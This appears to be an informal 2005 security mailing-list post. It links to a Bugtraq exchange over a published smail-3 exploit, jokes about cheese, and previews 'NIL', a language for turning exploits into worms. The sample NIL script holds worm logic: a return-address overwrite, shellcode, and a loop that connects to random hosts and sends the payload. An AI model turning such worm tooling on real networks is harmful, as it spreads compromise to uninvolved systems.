More stilton, but still pricey.

[Dave Aitel <dave () immunitysec com>]

In case you missed it (as I did) here's Sean pulling an Apache Nosejob 
on the Greg, author of smail-3.
http://www.weird.com/~woods/projects/smail.html <--original project page
http://archives.neohapsis.com/archives/bugtraq/2005-03/0435.html (sean - 
you're owned!)
http://archives.neohapsis.com/archives/bugtraq/2005-03/0459.html (greg - 
no I'm not)
http://archives.neohapsis.com/archives/bugtraq/2005-03/0462.html (sean - 
yes you are: write4!)
http://archives.neohapsis.com/archives/bugtraq/2005-03/0474.html (sean - 
here's a sploit!)

Greg takes it in good spirit though, which is good to see.


http://www.cheesesupply.com/ is apparently the place to buy cheese.

Does anyone else type in "Sans Dairy" into the googlebar instead of sans 
diary a lot? Maybe that's just me. But I'm never dissatisfied with the 
results!

In any case, here's a preview of the NIL (nematode intermediate 
language). You can generate this script simply by running ./nematode.py 
demosploit.py <--or any other exploit.

$ cat out.nem
nops 5000
stroverwrite %27%83%04%08 1036  <--this is just a return address
stroverwrite %CCtheshellcode 1044   <---this is actually a keyword for later
startloop
connect_random_host 5151
sendall
closesock
endloop

Then you can test it with ./neminterpret.py, which is also the launch 
script once you compiled the NIL into shellcode with 
nemx86shellcodegenerator.py. See? Complete cycle. Now all exploits are 
worms - and worms that you can build on the fly AND control with a level 
of reliability and trust.

-dave